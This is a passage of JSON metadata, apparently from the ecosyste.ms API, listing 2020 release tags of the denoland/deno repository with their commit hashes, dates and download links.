yste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/